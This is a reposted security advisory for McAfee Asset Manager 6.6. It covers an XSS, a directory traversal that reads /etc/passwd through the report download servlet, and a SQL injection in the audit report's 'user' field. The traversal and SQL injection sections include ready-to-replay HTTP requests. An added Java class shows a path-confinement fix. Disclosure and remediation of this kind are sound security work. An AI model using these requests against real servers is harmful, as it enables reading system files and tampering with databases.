Mayk0

McAfee Asset Manager 6.6 - Multiple Vulnerabilities

Mar 23rd, 2014
Full title: McAfee Asset Manager 6.6 - Multiple Vulnerabilities
Date: 2014-03-19
Category: web applications
Platform: jsp

=====================================

Cloud SSO is vulnerable to unauthenticated XSS in the authentication audit form:

https://twitter.com/BrandonPrry/status/445969380656943104

McAfee Asset Manager v6.6 multiple vulnerabilities

http://www.mcafee.com/us/products/asset-manager.aspx

Authenticated arbitrary file read

An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality.
When a user generates a report, the browser makes a request to /servlet/downloadReport?reportFileName=blah. The user can supply a relative directory traversal path in reportFileName and download /etc/passwd.

GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1
Host: 172.31.16.167
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.167/Inventory?filterColumns=&curViewId=-1&maintainQuery=true&format=search&collectorId=null&criticality=0&pageNum=1&location=Inventory&viewSelect=-999999&filterValueField=&orderBy=FIREWALLED&orderBy2=SITE&orderBy3=CRITICALITY_NAME&wsz=200&wszCtrl_1=200&action=AUDIT_REDISCOVER&formatSelect=
Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
Connection: keep-alive

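One way to close the arbitrary file read described above is to resolve the requested name against the report directory and refuse anything that lands outside it. This is an added example, not code from McAfee Asset Manager or from the original advisory; the class `ReportPathGuard`, the method `resolveReport` and the temporary report directory are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.Path;

// Hypothetical helper (not product code): confines a user-supplied report
// name to one directory before a download servlet opens the file.
public final class ReportPathGuard {

    static Path resolveReport(Path reportDir, String reportFileName) throws IOException {
        if (reportFileName == null || reportFileName.isEmpty()
                || reportFileName.indexOf('\0') >= 0) {
            throw new SecurityException("invalid report name");
        }
        Path base = reportDir.toRealPath();                        // canonical base, symlinks resolved
        Path candidate = base.resolve(reportFileName).normalize(); // collapses "../" segments
        if (!candidate.startsWith(base)) {                         // component-wise prefix check
            throw new SecurityException("report name escapes report directory");
        }
        // Resolve symlinks on the final path too, so a link placed inside the
        // report directory cannot point back out of it.
        Path real = candidate.toRealPath();                        // throws if the file does not exist
        if (!real.startsWith(base) || !Files.isRegularFile(real, LinkOption.NOFOLLOW_LINKS)) {
            throw new SecurityException("report name escapes report directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample data: a temporary report directory holding one report.
        Path dir = Files.createTempDirectory("reports");
        Files.write(dir.resolve("audit.csv"), "id,user\n".getBytes());

        String[] names = {
            "audit.csv",                            // legitimate request
            "../../../../../../../../etc/passwd",   // parameter value from the advisory
            "/etc/passwd",                          // absolute path replaces the base on resolve()
        };
        for (String name : names) {
            try {
                System.out.println("ALLOW " + resolveReport(dir, name));
            } catch (SecurityException | IOException e) {
                System.out.println("DENY  " + name + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

In a servlet, only the path returned by `resolveReport` should reach the file-open call; the raw `reportFileName` parameter should not be used again after validation.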
Authenticated SQL injection

An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. In the request below, the 'user' parameter is susceptible to SQL injection:

POST /jsp/reports/ReportsAudit.jsp HTTP/1.1
Host: 172.31.16.167
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.167/jsp/reports/ReportsAudit.jsp
Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator